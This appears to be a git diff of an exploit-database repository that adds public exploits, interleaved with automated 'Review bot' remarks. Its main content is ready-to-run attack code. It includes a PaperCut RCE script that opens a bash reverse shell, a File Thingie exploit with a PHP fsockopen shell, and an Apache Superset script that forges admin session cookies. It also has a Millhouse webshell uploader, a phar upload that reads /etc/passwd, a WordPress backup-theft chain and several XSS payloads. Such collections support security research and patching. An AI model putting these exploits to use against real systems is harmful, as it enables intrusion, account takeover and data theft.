+<iframe srcdoc"<img srcx onerroralert(parent.parent.nodeRequire('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());>')>">
+
+Ubuntu:
+<iframe srcdoc"<img srcx onerroralert(parent.parent.nodeRequire('child_process').execSync('gnome-calculator').toString());>')>">
+
+Opening the file in Yank Note will auto execute the Calculator application.
\ No newline at end of file
diff --git a/exploits/multiple/webapps/51447.py b/exploits/multiple/webapps/51447.py
new file mode 100755
index 000000000..6487a690c
--- /dev/null
+++ b/exploits/multiple/webapps/51447.py
@@ -0,0 +1,105 @@
+# Exploit Title: Apache Superset 2.0.0 - Authentication Bypass
+# Date: 10 May 2023
+# Exploit Author: MaanVader
+# Vendor Homepage: https://superset.apache.org/
+# Version: Apache Superset<= 2.0.1
+# Tested on: 2.0.0
+# CVE: CVE-2023-27524
+
+from flask_unsign import session
+import requests
+import urllib3
+import argparse
+import re
+from time import sleep
+from selenium import webdriver
+from urllib.parse import urlparse
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+
+SECRET_KEYS = [
+ b'\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h', # version < 1.4.1
+ b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET', # version >= 1.4.1
+ b'thisISaSECRET_1234', # deployment template
+ b'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY', # documentation
+ b'TEST_NON_DEV_SECRET' # docker compose
+]
+
+def main():
+
+ parser = argparse.ArgumentParser()
+ parser.add_argument('--url', '-u', help='Base URL of Superset instance', required=True)
+ parser.add_argument('--id', help='User ID to forge session cookie for, default=1', required=False, default='1')
+ args = parser.parse_args()
+
+ try:
+ u = args.url.rstrip('/') + '/login/'
+
+ headers = {
+ 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0'
+ }
+
+ resp = requests.get(u, headers=headers, verify=False, timeout=30, allow_redirects=False)
+ if resp.status_code != 200:
+ print(f'Error retrieving login page at {u}, status code: {resp.status_code}')
+ return
+
+ session_cookie = None
+ for c in resp.cookies:
+ if c.name == 'session':
+ session_cookie = c.value
+ break
+
+ if not session_cookie:
+ print('Error: No session cookie found')
+ return
+
+ print(f'Got session cookie: {session_cookie}')
+
+ try:
+ decoded = session.decode(session_cookie)
+ print(f'Decoded session cookie: {decoded}')
+ except:
+ print('Error: Not a Flask session cookie')
+ return
+
+ match = re.search(r'"version_string": "(.*?)"', resp.text)
+ if match:
+ version = match.group(1)
+ else:
+ version = 'Unknown'
+
+ print(f'Superset Version: {version}')
+
+
+ for i, k in enumerate(SECRET_KEYS):
+ cracked = session.verify(session_cookie, k)
+ if cracked:
+ break
+
+ if not cracked:
+ print('Failed to crack session cookie')
+ return
+
+ print(f'Vulnerable to CVE-2023-27524 - Using default SECRET_KEY: {k}')
+
+ try:
+ user_id = int(args.id)
+ except:
+ user_id = args.id
+
+ forged_cookie = session.sign({'_user_id': user_id, 'user_id': user_id}, k)
+ print(f'Forged session cookie for user {user_id}: {forged_cookie}')
+ u1 = args.url.rstrip('/') + '/superset/welcome'
+
+ print(f"Now visit the url: `{u1}` and replace the current session cookie with this `{forged_cookie}` and refresh the page and we will be logged in as admin to the dashboard:)")
+
+
+
+
+ except Exception as e:
+ print(f'Unexpected error: {e}')
+
+
+if __name__ == '__main__':
+ main()
\ No newline at end of file
diff --git a/exploits/multiple/webapps/51452.py b/exploits/multiple/webapps/51452.py
new file mode 100755
index 000000000..9960e75bc
--- /dev/null
+++ b/exploits/multiple/webapps/51452.py
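Review bot: Two bare `except:` clauses — the one around `session.decode(session_cookie)` and the one around `int(args.id)` — swallow everything including `KeyboardInterrupt` and `SystemExit`; `except Exception:` is the narrowest form that still covers what each guard intends. `sleep`, `webdriver` and `urlparse` are imported but never used, and the `selenium` import in particular adds a non-stdlib dependency the script does not need. The loop over `SECRET_KEYS` is the same check an operator can run against their own instance as a configuration audit, yet the script prints the matched key without noting that rotating `SECRET_KEY` (which invalidates every existing session) is the remediation; a closing comment such as `# Remediation: set a unique SECRET_KEY; existing sessions are invalidated on rotation` would help readers who arrive here from the CVE.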
@@ -0,0 +1,115 @@
+# Exploit Title: PaperCut NG/MG 22.0.4 - Remote Code Execution (RCE)
+# Date: 13 May 2023
+# Exploit Author: Mohin Paramasivam (Shad0wQu35t) and MaanVader
+# Vendor Homepage: https://www.papercut.com/
+# Version: 8.0 or later
+# Tested on: 22.0.4
+# CVE: CVE-2023-27350
+
+
+import requests
+import argparse
+
+Group_payload = {
+ "service":"direct/1/OptionsUserSync/$OptionsUserSource.$Form",
+ "sp":"S0",
+ "Form0":"$Hidden,$Hidden$0,$Hidden$1,$PropertySelection,$Hidden$2,$Hidden$3,$Hidden$4,$Hidden$5,$Hidden$6,$Hidden$7,$Hidden$8,$Hidden$9,$Hidden$10,$Hidden$11,$Hidden$12,$Hidden$13,$Hidden$14,$TextField,$TextField$0,$RadioGroup,$Submit,$Checkbox$2,primaryCardIdLength,$Checkbox$3,secondaryCardIdLength,$Checkbox$5,$Hidden$15,$Hidden$16,$Hidden$17,$Hidden$18,$Hidden$19,$Hidden$20,$Hidden$21,$PropertySelection$4,$TextField$13,$Checkbox$6,$TextField$14,$TextField$15,$TextField$16,$RadioGroup$0,$Submit$1,$PropertySelection$5,$TextField$17,$PropertySelection$6,$TextField$18,primaryCardId2Length,$PropertySelection$7,$TextField$19,secondaryCardId2Length,$Checkbox$7,$TextField$20,$Checkbox$8,$Checkbox$9,$Checkbox$10,$Submit$2,$Submit$3,$Submit$4,$Submit$5",
+ "$Hidden":"Sf278fd737ffcaed6eb3d1f67c2ba5c6d",
+ "$Hidden$0":"F",
+ "$Hidden$1":"F",
+ "$Hidden$2":"OH4sIAAAAAAAAAJWQwUrDQBCGp60VBBUp4lWRnncRPIjSg4iHwrYNpBU8xXW7JitJdp1sis2hF5_BlxBP-lw-gF50Y2Mp6MW5DTP_fP8_z2_QzBDotSqI4UaiyC0xIg1JJnGihCQDY5VOs5HrfZ2jkMOpkVeHny8bD8VeHVa6sBYYVBqVnTLYCnhuIw91iDzxuI0stNgtn3Aa8zSkvkWVhies1MTc3mhMLBwzR6c_dFrSaUWnf9LbXqV1h3aCfDFbwt7BDGr3CO3fwXKrYsK04LEq5Pg8zZPex26j87i-XQdwkn2NIeGGi0gSoZPE4Ulpnki3mpFS8N556r4eXBR1qDFoqj5P5BxoLKyejfzhoAcAYzNDOPrnZxfZoKrWt6nN8odzG6WB5aFjNk77l-YLeZfbs8sBAAA.",
+ "$Hidden$3":"F",
+ "$Hidden$4":"X",
+ "$Hidden$5":"X",
+ "$Hidden$6":"X",
+ "$Hidden$7":"X",
+ "$Hidden$8":"X",
+ "$Hidden$9":"X",
+ "$Hidden$10":"X",
+ "$Hidden$11":"X",
+ "$Hidden$12":"X",
+ "$Hidden$13":"F",
+ "$Hidden$14":"X",
+ "$Hidden$15":"F",
+ "$Hidden$16":"S",
+ "$Hidden$17":"S",
+ "$Hidden$18":"S",
+ "$Hidden$19":"S",
+ "$Hidden$20":"F",
+ "$Hidden$21":"SSTANDARD_UNIX",
+ "$PropertySelection":"3,CUSTOM",
+ "$TextField":"/usr/bin/python3",
+ "$TextField$0":"/usr/bin/python3",
+ "$RadioGroup":"0",
+ "primaryCardIdLength":"8",
+ "secondaryCardIdLength":"8",
+ "$PropertySelection$4":"0,STANDARD_UNIX",
+ "$TextField$13":"",
+ "$TextField$14":"",
+ "$TextField$15":"",
+ "$TextField$16":"",
+ "$RadioGroup$0":"0",
+ "$PropertySelection$5":"NONE",
+ "$TextField$17":"",
+ "$PropertySelection$6":"NONE",
+ "$TextField$18":"employeeNumber",
+ "primaryCardId2Length":"8",
+ "$PropertySelection$7":"NONE",
+ "$TextField$19":"",
+ "secondaryCardId2Length":"8",
+ "$TextField$20":"",
+ "$Submit$4":"Apply"
+
+}
+
+
+parser = argparse.ArgumentParser(description="Papercut RCE")
+parser.add_argument('--url',help='Url of the vunerable application example http://10.2.3.4:9191 dont need the trailing /')
+parser.add_argument('--ip',help='our rev shell ip')
+parser.add_argument('--port',help='our rev shell port')
+args = parser.parse_args()
+
+url = args.url
+ip = args.ip
+port = args.port
+
+passwd_input = f"import os;os.system(\"/bin/bash -c 'bash -i >& /dev/tcp/{ip}/{port} 0>&1'\")"
+
+final_payload = {
+ "service":"direct/1/Home/$Form$0",
+ "sp":"S0",
+ "Form0":"$Hidden$0,$Hidden$1,inputUsername,inputPassword,$PropertySelection$0,$Submit$0",
+ "$Hidden$0":"true",
+ "$Hidden$1":"X",
+ "inputUsername":"help",
+ "inputPassword":passwd_input,
+ "$PropertySelection$0":"en",
+ "$Submit$0":"Log+in"
+}
+
+# create a session
+session = requests.Session()
+
+# visit the first URL to set up the session
+setup_url = url+"/app?service=page/SetupCompleted"
+response = session.get(setup_url)
+response.raise_for_status() # check for any errors
+
+# visit the second URL using the same session
+dashboard_url = url+"/app?service=page/Dashboard"
+response = session.get(dashboard_url)
+response.raise_for_status() # check for any errors
+
+# URL to change user group
+user_group_change_url = url+"/app"
+response = session.post(user_group_change_url,data=Group_payload)
+response.raise_for_status() # check for errors
+
+# URL to gain RCE
+rce_url = url+"/app"
+response = session.post(rce_url,data=final_payload)
+response.raise_for_status() # Check for any errors
+
+
+# print the response text
+print(response.text)
\ No newline at end of file
diff --git a/exploits/multiple/webapps/51480.txt b/exploits/multiple/webapps/51480.txt
new file mode 100644
index 000000000..216798d0c
--- /dev/null
+++ b/exploits/multiple/webapps/51480.txt
@@ -0,0 +1,30 @@
+# Exploit Title: FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting)
+# Date: 2023-05-24
+# Exploit Author: Andrea Intilangelo
+# Vendor Homepage: https://www.squarepiginteractive.com
+# Software Link: https://www.fusioninvoice.com/store
+# Version: 2023-1.0
+# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 113.0.1, Microsoft Edge 113.0.1774.50)
+# CVE: CVE-2023-25439
+
+Description:
+
+A stored cross-site scripting (XSS) vulnerability in FusionInvoice 2023-1.0 (from Sqware Pig, LLC) allows attacker to
+execute arbitrary web scripts or HTML.
+
+Injecting persistent javascript code inside the title and/or description while creating a task/expense/project (and
+possibly others) it will be triggered once page gets loaded.
+
+
+Steps to reproduce:
+
+- Click on "Expenses", or "Tasks" and add (or edit an existing) one,
+- Insert a payload PoC inside a field, in example in the "Phone number" (or "Description"),
+- Click on 'Save'.
+
+Visiting the website dashboard, as well as the customer or project summary page, the javascript code will be executed.
+
+
+PoC Screenshots:
+
+https://imagebin.ca/v/7FOZfztkDs3I
\ No newline at end of file
diff --git a/exploits/php/webapps/51436.py b/exploits/php/webapps/51436.py
index fbd61ba50..9773f948c 100755
--- a/exploits/php/webapps/51436.py
+++ b/exploits/php/webapps/51436.py
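Review bot: `Group_payload` breaks the module's own snake_case naming (`final_payload`, `passwd_input`) and should be `group_payload`; the three `# check for any errors` comments after `raise_for_status()` repeat what the call name already says and differ only in capitalization. None of `--url`, `--ip` or `--port` is declared `required=True`, so a missing flag reaches `url+"/app?service=page/SetupCompleted"` as `None` and ends in a `TypeError` instead of a usage message. For defenders the request sequence is also the detection signature — an unauthenticated `GET /app?service=page/SetupCompleted`, then `/app?service=page/Dashboard`, then a POST to `/app` carrying `service=direct/1/OptionsUserSync/...` from one session is exactly what an access log would show — and a comment stating that would serve both readers.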
@@ -1,6 +1,6 @@ #!/usr/bin/python -# Exploit Title: File Thingie 2.5.7 - Remote Code Execution (RCE) +# Exploit Title: File Thingie 2.5.7 - Arbitary File Upload to RCE # Google Dork: N/A # Date: 27th of April, 2023 # Exploit Author: Maurice Fielenbach (grimlockx) - Hexastrike Cybersecurity UG (haftungsbeschränkt) @@ -11,7 +11,7 @@ # Vulnerability originally discovered / published by Cakes # Reference: https://www.exploit-db.com/exploits/47349 -# Run a local listener on your machine and youre good to go +# Run a local listener on your machine and you're good to go import os @@ -44,7 +44,7 @@ class Exploit: elif response.status_code == 200: if "Invalid username or password" in response.text: - print(f"Invalid username or password") + print(f"[-] Invalid username or password") return False return True @@ -74,7 +74,7 @@ class Exploit: print(f"[+] Zipped payload to {self.payload_filename}.zip") return True except: - print(f"[-] Could not create payload to {self.payload_filename}.zip") + print(f"[-] Could not zip payload to {self.payload_filename}.zip") return False def upload_payload(self) -> bool: @@ -142,7 +142,7 @@ class Exploit: if f"<p class='ok'>{self.payload_filename}.zip unzipped.</p>" in response.text: print("[+] Unzipping payload successful") - print(f"[+] You can now execute commands by opening {self.get_base_url()}/{self.payload_filename}/{self.payload_filename}.php?cmd=<command>") + print(f"[+] You can now execute commands by browsing {self.get_base_url()}/{self.payload_filename}/{self.payload_filename}.php?cmd=<command>") return True else: @@ -150,7 +150,7 @@ class Exploit: return False def execute_payload(self) -> bool: - print("[*] Trying the get a reverse shell") + print("[*] Trying to get a reverse shell") cmd = quote(f"php -r \'$sock=fsockopen(\"{self.lhost}\",{self.lport});system(\"/bin/bash <&3 >&3 2>&3\");\'") print("[*] Executing payload") 
diff --git a/exploits/php/webapps/51443.txt b/exploits/php/webapps/51443.txt
new file mode 100644
index 000000000..8d01794dd
--- /dev/null
+++ b/exploits/php/webapps/51443.txt
@@ -0,0 +1,124 @@
+#Exploit Title: TinyWebGallery v2.5 - Remote Code Execution (RCE)
+#Application: TinyWebGallery
+#Version: v2.5
+#Bugs: RCE
+#Technology: PHP
+#Vendor URL: http://www.tinywebgallery.com/
+#Software Link: https://www.tinywebgallery.com/download.php?tinywebgallery=latest
+#Date of found: 07-05-2023
+#Author: Mirabbas Ağalarov
+#Tested on: Linux
+
+2. Technical Details & POC
+========================================
+steps:
+
+1. Go to upload image http://localhost/twg25/admin/index.php?action=upload&sview=no&menu=true
+2. upload .phar file
+payload: payload: <?php echo system("cat /etc/passwd"); ?>
+3. go to file link
+
+
+poc request:
+
+
+POST /twg25/admin/index.php?action=upload&dir=&order=name&srt=yes&tview=no&sview=no&lang=en HTTP/1.1
+Host: localhost
+Content-Length: 2123
+Cache-Control: max-age=0
+sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Linux"
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary53rZRhJinqaMm7Ip
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/twg25/admin/index.php?action=upload&sview=no&menu=true
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=qc7mfbthpf7tnf32a34p8l766k
+Connection: close
+
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="token"
+
+b2ed5512107a625ef9d5688ced296c61
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="MAX_FILE_SIZE"
+
+2097152
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="confirm"
+
+true
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="userfile[]"; filename="shell.phar"
+Content-Type: application/octet-stream
+
+<?php echo system("cat /etc/passwd"); ?>
+
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="userfile[]"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="userfile[]"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="userfile[]"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="userfile[]"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="userfile[]"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="userfile[]"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="userfile[]"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="userfile[]"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="userfile[]"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="twgsize"
+
+100000
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="twgquality"
+
+80
+------WebKitFormBoundary53rZRhJinqaMm7Ip--
+
+
+
+
+
+http://localhost/twg25/pictures/shell.phar
\ No newline at end of file
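Review bot: The writeup shows the request and the resulting URL but never states the two conditions the finding actually depends on — the upload handler accepting a `.phar` name in `userfile[]`, and the web server executing that file as PHP when served from `/twg25/pictures/` — so a maintainer cannot tell which one to fix. A short "Root cause / fix" paragraph saying that an extension allowlist on upload plus disabling script execution in the pictures directory each independently close this would make the advisory useful beyond reproduction. Step 2 also reads `payload: payload:`, a doubled label that should be collapsed, and `#Date of found` would read better as `#Date found`.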
diff --git a/exploits/php/webapps/51445.txt b/exploits/php/webapps/51445.txt
new file mode 100644
index 000000000..f483cf49c
--- /dev/null
+++ b/exploits/php/webapps/51445.txt
@@ -0,0 +1,38 @@
+# Exploit Title: WordPress Plugin Backup Migration 1.2.8 - Unauthenticated Database Backup
+# Google Dork: intitle:("Index of /wp-content/plugins/backup-backup") AND inurl:("plugins/backup-backup/")
+# Date: 2023-05-10
+# Exploit Author: Wadeek
+# Vendor Homepage: https://backupbliss.com/
+# Software Link: https://downloads.wordpress.org/plugin/backup-backup.1.2.8.zip
+# Version: 1.2.8
+# Tested on: WordPress 6.2
+
+1) Get the version of the plugin.
+
+=> GET /wp-content/plugins/backup-backup/readme.txt
+--------------------------------------------------------------------------
+Stable tag: 1.2.8
+--------------------------------------------------------------------------
+
+2) Get the name of the backup directory.
+
+=> GET /wp-content/backup-migration/config.json
+--------------------------------------------------------------------------
+{
+[...],
+"STORAGE::LOCAL::PATH":"[...]/wp-content/backup-migration-xXxXxxXxXx",
+[...],
+"OTHER:EMAIL":"admin@email.com"
+}
+--------------------------------------------------------------------------
+
+3) Get the name of the archive containing the backups.
+
+=> GET /wp-content/backup-migration/complete_logs.log
+--------------------------------------------------------------------------
+BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip
+--------------------------------------------------------------------------
+
+4) Build the path for the download.
+
+=> GET /wp-content/backup-migration-xXxXxxXxXx/backups/BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip
\ No newline at end of file
diff --git a/exploits/php/webapps/51449.txt b/exploits/php/webapps/51449.txt
new file mode 100644
index 000000000..a3997fc77
--- /dev/null
+++ b/exploits/php/webapps/51449.txt
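Review bot: The chain turns on `config.json` and `complete_logs.log` under `/wp-content/backup-migration/` being readable without authentication, which is what defeats the randomized `-xXxXxxXxXx` suffix on the storage directory; the writeup never says so. A closing line stating that denying direct web access to that directory (or keeping backups outside the web root) breaks steps 2 and 3 regardless of the suffix would make the note useful to site owners as well as testers. The `xXxXxxXxXx` and `YYYY-MM-DD_00_00_00` tokens are evidently placeholders for per-site values, but nothing in the text says so and a reader may take them literally.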
@@ -0,0 +1,150 @@
+# Exploit Title: e107 v2.3.2 - Reflected XSS
+# Date: 11/05/2022
+# Exploit Author: Hubert Wojciechowski
+# Contact Author: hub.woj12345@gmail.com
+# Vendor Homepage: https://e107.org/
+# Software Link: https://e107.org/download
+# Version: 2.3.2
+# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+
+### XSS Reflected - unauthorized
+
+URL: http://127.0.0.1/e107/e107_plugins/tinymce4/plugins/e107/parser.php
+Parameters: content
+
+# POC
+Request:
+POST /e107/e107_plugins/tinymce4/plugins/e107/parser.php HTTP/1.1
+Host: 127.0.0.1
+Content-Length: 1126
+sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
+Accept: text/html, */*; q=0.01
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
+sec-ch-ua-platform: "Windows"
+Origin: http://127.0.0.1
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: http://127.0.0.1/e107/e107_admin/newspost.php?mode=main&action=edit&id=3
+Accept-Encoding: gzip, deflate
+Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
+Connection: close
+
+content=%5Bhtml%5D%3Cp%3E%3Cstrong%3ELore"/><script>alert(1)</script>bb&mode=tohtml
+
+Response:
+HTTP/1.1 200 OK
+Date: Thu, 11 May 2023 19:38:45 GMT
+Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
+X-Powered-By: PHP/7.4.29
+Set-Cookie: PHPSESSID=c4mphnf1igb7lbibn4q1eni10h; expires=Fri, 12-May-2023 19:38:45 GMT; Max-Age=86400; path=/e107/; HttpOnly
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Content-Length: 1053
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+<!-- bbcode-html-start --><p><strong>Lore"/><script>alert(1)</script>bb
+
+### XSS Reflected - Authorized
+
+URL: http://127.0.0.1/e107/e107_admin/image.php
+Parameters: for
+
+# POC 1
+Request:
+GET /e107/e107_admin/image.php?mode=main&action=dialog&for=_commonh5it1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253edezaw&tagid=media-cat-image&iframe=1&w=206&image=1 HTTP/1.1
+Host: 127.0.0.1
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
+Connection: close
+
+Response:
+HTTP/1.1 200 OK
+Date: Thu, 04 May 2023 03:07:35 GMT
+Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
+X-Powered-By: e107
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+ETag: "37f107dbe6a998ecf7b71689627c2a56"
+Content-Length: 12420
+Vary: Accept-Encoding
+X-Frame-Options: SAMEORIGIN
+Connection: close
+Content-Type: text/html; charset=utf-8
+
+<!doctype html>
+<html lang="en">
+<head>
+<title>Media Manager - Admin Area :: hacked">bbbbb</title>
+<meta charset='utf-8' />
+<meta name="viewport" content="width=device-width, initial-scale=0.8, maximum-scale=1" />
+<!-- *CSS* -->
+[...]
+<div id="uploader" data-max-size="2mb" rel="/e107/e107_web/js/plupload/upload.php?for=_commonh5it1"><img src=a onerror=alert(1)>dezaw&path=">
+ <p>No HTML5 support.</p>
+ </div>
+[...]
+
+# POC 2
+
+URL: http://127.0.0.1/e107/e107_admin/newspost.php
+Parameters: Payload in URL
+
+Request:
+GET /e107/e107_admin/newspost.php/sdd4h"><script>alert(1)</script>kzb89?mode=main&action=list HTTP/1.1
+Host: 127.0.0.1
+Cache-Control: max-age=0
+sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Windows"
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://127.0.0.1/e107/e107_admin/newspost.php?mode=main&action=edit&id=3
+Accept-Encoding: gzip, deflate
+Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: PHPSESSID=ftq2gnr1kgjqhfa3u902thraa8
+Connection: close
+
+Response:
+
+
+
+
+HTTP/1.1 200 OK
+Date: Fri, 05 May 2023 06:21:53 GMT
+Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
+X-Powered-By: e107
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+ETag: "d127dd6a44a22e093fed60b83bf36af2"
+Content-Length: 72914
+Vary: Accept-Encoding
+X-Frame-Options: SAMEORIGIN
+Connection: close
+Content-Type: text/html; charset=utf-8
+
+<!doctype html>
+<html lang="en">
+<head>
+<title>News - List - Admin Area :: hacked">bbbbb</title>
+<meta charset='utf-8' />
+<meta name="viewport" content="width=device-width, initial-scale=0.8, maximum-scale=1" />
+<!-- *CSS* -->
+[...]
+<a class="btn btn-default btn-secondary nextprev-item next " href="http://127.0.0.1/e107/e107_admin/newspost.php/sdd4h">
+<script>alert(1)</script>kzb89/?mode=main&action=list&from=10" title="Go to the next page" ><i class="fa fa-forward"></i></a>
+[...]
\ No newline at end of file
diff --git a/exploits/php/webapps/51450.php b/exploits/php/webapps/51450.php
new file mode 100644
index 000000000..a6309f5e5
--- /dev/null
+++ b/exploits/php/webapps/51450.php
@@ -0,0 +1,84 @@
+<?php
+/*
+Exploit Title: thrsrossi Millhouse-Project 1.414 - Remote Code Execution
+Date: 12/05/2023
+Exploit Author: Chokri Hammedi
+Vendor Homepage: https://github.com/thrsrossi/Millhouse-Project
+Software Link: https://github.com/thrsrossi/Millhouse-Project.git
+Version: 1.414
+Tested on: Debian
+CVE: N/A
+*/
+
+
+$options = getopt('u:c:');
+
+if(!isset($options['u'], $options['c']))
+die("\033[1;32m \n Millhouse Remote Code Execution \n Author: Chokri Hammedi
+\n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n
+\033[0m\n
+\n");
+
+$target = $options['u'];
+
+$command = $options['c'];
+
+$url = $target . '/includes/add_post_sql.php';
+
+
+$post = '------WebKitFormBoundaryzlHN0BEvvaJsDgh8
+Content-Disposition: form-data; name="title"
+
+helloworld
+------WebKitFormBoundaryzlHN0BEvvaJsDgh8
+Content-Disposition: form-data; name="description"
+
+<p>sdsdsds</p>
+------WebKitFormBoundaryzlHN0BEvvaJsDgh8
+Content-Disposition: form-data; name="files"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundaryzlHN0BEvvaJsDgh8
+Content-Disposition: form-data; name="category"
+
+1
+------WebKitFormBoundaryzlHN0BEvvaJsDgh8
+Content-Disposition: form-data; name="image"; filename="rose.php"
+Content-Type: application/x-php
+
+<?php
+$shell = shell_exec("' . $command . '");
+echo $shell;
+?>
+
+------WebKitFormBoundaryzlHN0BEvvaJsDgh8--
+';
+
+$headers = array(
+ 'Content-Type: multipart/form-data;
+boundary=----WebKitFormBoundaryzlHN0BEvvaJsDgh8',
+ 'Cookie: PHPSESSID=rose1337',
+);
+
+$ch = curl_init($url);
+curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
+curl_setopt($ch, CURLOPT_URL, $url);
+curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
+curl_setopt($ch, CURLOPT_POST, true);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
+curl_setopt($ch, CURLOPT_HEADER, true);
+
+$response = curl_exec($ch);
+curl_close($ch);
+
+// execute command
+
+$shell = "{$target}/images/rose.php?cmd=" . urlencode($command);
+$ch = curl_init($shell);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
+$exec_shell = curl_exec($ch);
+curl_close($ch);
+echo "\033[1;32m \n".$exec_shell . "\033[0m\n \n";
+
+?>
\ No newline at end of file
diff --git a/exploits/php/webapps/51451.txt b/exploits/php/webapps/51451.txt
new file mode 100644
index 000000000..e8f7ef9c0
--- /dev/null
+++ b/exploits/php/webapps/51451.txt
@@ -0,0 +1,28 @@
+[#] Exploit Title: WBiz Desk 1.2 - SQL Injection
+[#] Exploit Date: May 12, 2023.
+[#] CVSS 3.1: 6.4 (Medium)
+[#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+[#] Tactic: Initial Access (TA0001)
+[#] Technique: Exploit Public-Facing Application (T1190)
+[#] Application Name: WBiz Desk
+[#] Application Version: 1.2
+[#] Link: https://www.codester.com/items/5641/wbiz-desk-simple-and-effective-help-desk-system
+
+
+[#] Author: h4ck3r - Faisal Albuloushi
+[#] Contact: SQL@hotmail.co.uk
+[#] Blog: https://www.0wl.tech
+
+
+[#] 3xploit:
+
+[path]//ticket.php?tk=[SQL Injection]
+
+
+[#] 3xample:
+
